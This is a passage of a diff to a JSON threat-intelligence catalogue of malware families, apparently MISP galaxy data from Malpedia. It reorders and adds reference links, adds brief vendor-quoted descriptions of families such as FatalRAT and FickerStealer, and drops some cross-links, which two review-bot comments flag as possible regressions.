- "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
- "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html",
- "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
"https://gvnshtn.com/maersk-me-notpetya/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
- "http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
"https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/",
+ "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786",
+ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
+ "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
+ "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/",
+ "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
+ "http://www.intezer.com/notpetya-returns-bad-rabbit/",
+ "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
+ "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
+ "https://securelist.com/from-blackenergy-to-expetr/78937/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
+ "https://securelist.com/bad-rabbit-ransomware/82851/",
+ "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/",
+ "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
+ "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/",
+ "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
+ "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine",
+ "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://attack.mitre.org/groups/G0034",
+ "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
+ "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
+ "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
+ "https://istari-global.com/spotlight/the-untold-story-of-notpetya/",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/",
- "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://www.riskiq.com/blog/labs/badrabbit/",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
+ "https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/",
+ "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
+ "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
"https://securelist.com/schroedingers-petya/78870/",
+ "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
+ "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
+ "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
"https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/",
- "https://securelist.com/from-blackenergy-to-expetr/78937/"
+ "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html"
],
"synonyms": [
"BadRabbit",
@@ -22500,8 +23895,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_clipper",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
- "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/"
+ "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/",
+ "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/"
],
"synonyms": [],
"type": []
@@ -22514,9 +23910,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_ransomware",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
"https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/"
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/"
],
"synonyms": [],
"type": []
@@ -22529,13 +23925,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_stealer",
- "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
"https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/",
"https://twitter.com/3xp0rtblog/status/1509601846494695438",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on",
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
+ "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://ke-la.com/information-stealers-a-new-landscape/"
+ "https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/",
+ "https://blog.morphisec.com/nft-malware-new-evasion-abilities"
],
"synonyms": [],
"type": []
@@ -22548,9 +23947,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_worm",
- "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/",
"https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/",
- "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/"
+ "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/",
+ "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/"
],
"synonyms": [],
"type": []
@@ -22563,24 +23962,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot",
- "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html",
+ "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise",
"https://www.secureworks.com/research/threat-profiles/bronze-globe",
- "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise"
+ "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
],
"synonyms": [
"HighTide"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "91583583-95c0-444e-8175-483cbebc640b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "91af1080-6378-4a90-ba1e-78634cd31efe",
"value": "EtumBot"
},
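Review bot: the `related` array pointing at dest-uuid 91583583-95c0-444e-8175-483cbebc640b (type `similar`, almost-certain) is removed with nothing taking its place, so EtumBot loses its cross-galaxy link. If the generator no longer emits `related` entries, say so in the commit message; otherwise this reads as an accidental regression. The ref reorder above it is harmless.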
@@ -22589,8 +23979,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny",
- "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
+ "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/",
"https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/"
],
"synonyms": [],
@@ -22599,6 +23989,20 @@
"uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3",
"value": "Evilbunny"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilextractor",
+ "https://www.netresec.com/?page=Blog&month=2023-04&post=EvilExtractor-Network-Forensics",
+ "https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e020212b-03ef-4168-97f5-bb72ff627d94",
+ "value": "EvilExtractor"
+ },
{
"description": "",
"meta": {
@@ -22613,15 +24017,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c9b4ec27-0a43-4671-a967-bcac5df0e056",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc",
"value": "EvilGrab"
},
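Review bot: same concern as on the EtumBot hunk: the `related` entry for dest-uuid c9b4ec27-0a43-4671-a967-bcac5df0e056 is removed from EvilGrab and nothing replaces it.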
@@ -22630,12 +24025,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions",
- "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
"https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions",
"https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A"
],
"synonyms": [],
@@ -22690,13 +24085,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
"https://www.wired.com/story/sandworm-centreon-russia-hack/",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
"https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://attack.mitre.org/groups/G0034",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -22704,6 +24099,19 @@
"uuid": "dd68abd7-b20a-40a5-be53-ae8d45c1dd27",
"value": "Exaramel (Windows)"
},
+ {
+ "description": "ExByte is a custom data exfiltration tool and infostealer observed being used during BlackByte ransomware attacks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "42f4fee9-a5c2-4643-be56-fba8700f835d",
+ "value": "ExByte"
+ },
{
"description": "",
"meta": {
@@ -22726,8 +24134,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://github.com/nccgroup/Royal_APT"
+ "https://github.com/nccgroup/Royal_APT",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
@@ -22753,8 +24161,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.exmatter",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
"https://www.kroll.com/en/insights/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool",
+ "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack",
+ "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration",
"https://twitter.com/knight0x07/status/1461787168037240834?s=20"
],
"synonyms": [],
@@ -22781,10 +24191,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro",
- "https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro",
+ "https://youtu.be/3RYbkORtFnk",
"https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro"
+ "https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/"
],
"synonyms": [
"Xpiro"
@@ -22796,18 +24207,31 @@
},
{
"description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d3600857-b941-4d47-81ef-02c168396518",
+ "value": "ExplosiveRAT"
+ },
+ {
+ "description": "According to Trend MIcro, Extreme RAT (XTRAT, Xtreme Rat) is a Remote Access Trojan that can steal information. This RAT has been used in attacks targeting Israeli and Syrian governments last 2012.\r\n\r\nThis malware family of backdoors has the capability to receive commands such as File Management (Download, Upload, and Execute Files), Registry Management (Add, Delete, Query, and Modify Registry), Perform Shell Command, Computer Control (Shutdown, Log on/off), and Screen capture from a remote attacker. In addition, it can also log keystrokes of the infected systems.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat",
+ "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1",
+ "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
+ "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html",
+ "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
"https://citizenlab.ca/2015/12/packrat-report/",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
"https://blogs.360.cn/post/APT-C-44.html",
"https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017",
- "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html",
- "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat",
- "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
- "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html",
- "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1"
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat"
],
"synonyms": [
"ExtRat"
@@ -22822,8 +24246,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid",
- "http://blog.talosintel.com/2017/01/Eye-Pyramid.html",
- "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/"
+ "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/",
+ "http://blog.talosintel.com/2017/01/Eye-Pyramid.html"
],
"synonyms": [],
"type": []
@@ -22836,11 +24260,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice",
- "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/",
- "https://www.epicturla.com/blog/the-lost-nazar",
+ "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
"https://blog.malwarelab.pl/posts/nazar_eyservice/",
- "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/"
+ "https://www.epicturla.com/blog/the-lost-nazar",
+ "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/"
],
"synonyms": [],
"type": []
@@ -22848,6 +24272,20 @@
"uuid": "9b287426-e82f-407e-8d12-42dac4241bf8",
"value": "EYService"
},
+ {
+ "description": "Fabookie is facebook account info stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie",
+ "https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "782aa125-42ff-4ca0-b9b1-362aac08566b",
+ "value": "Fabookie"
+ },
{
"description": "",
"meta": {
@@ -22912,10 +24350,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny",
- "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1",
"https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
+ "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
"https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
"https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/"
@@ -22925,20 +24363,11 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1e25d254-3f03-4752-b8d6-023a23e7d4ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e",
"value": "Fanny"
},
{
- "description": "",
+ "description": "According to PCrisk, Fantom is a ransomware-type virus that imitates the Windows update procedure while encrypting files. This is unusual, since most ransomware encrypts files stealthily without showing any activity. During encryption, Fantom appends the names of encrypted files with the \".locked4\", \".fantom\" or \".locked\" extension.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt",
@@ -22955,9 +24384,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer",
+ "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/",
"https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/"
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/"
],
"synonyms": [],
"type": []
@@ -22982,11 +24411,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos",
- "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568",
"https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
"http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/",
- "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf"
+ "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf",
+ "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/"
],
"synonyms": [],
"type": []
@@ -22995,14 +24424,14 @@
"value": "FastPOS"
},
{
- "description": "",
+ "description": "According to PCrisk, FatalRAT is the name of a Remote Access Trojan (RAT). A RAT is a type of malware that allows the attacker to remotely control the infected computer and use it for various purposes.\r\n\r\nTypically, RATs are used to access files and other data, watch computing activities on the screen and capture screenshots, steal sensitive information (e.g., login credentials, credit card details).\r\n\r\nThere are many legitimate remote administration/access tools on the Internet. It is common that cybercriminals use those tools with malicious intent too.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
"https://www.youtube.com/watch?v=gjvnVZc11Vg",
- "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
- "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis"
+ "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
+ "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
],
"synonyms": [],
"type": []
@@ -23024,6 +24453,19 @@
"uuid": "4325c84b-9a9b-4e7c-977f-20d7ae817b7e",
"value": "FatDuke"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fauppod",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e363918a-92ec-49c0-b3b2-1d339200417b",
+ "value": "Fauppod"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -23055,8 +24497,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot",
- "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html",
"https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
+ "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257"
],
"synonyms": [],
@@ -23083,10 +24526,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo",
- "https://feodotracker.abuse.ch/",
"http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html",
- "https://en.wikipedia.org/wiki/Maksim_Yakubets",
"http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
+ "https://en.wikipedia.org/wiki/Maksim_Yakubets",
+ "https://feodotracker.abuse.ch/",
"https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/"
],
"synonyms": [
@@ -23095,20 +24538,11 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "372cdc12-d909-463c-877a-175f97f7abb5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "66781866-f064-467d-925d-5e5f290352f0",
"value": "Feodo"
},
{
- "description": "",
+ "description": "According to PCrisk, FFDroider is a malicious program classified as a stealer. It is designed to extract and exfiltrate sensitive data from infected devices. FFDroider targets popular social media and e-commerce platforms in particular.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ffdroider",
@@ -23122,19 +24556,19 @@
"value": "FFDroider"
},
{
- "description": "",
+ "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer",
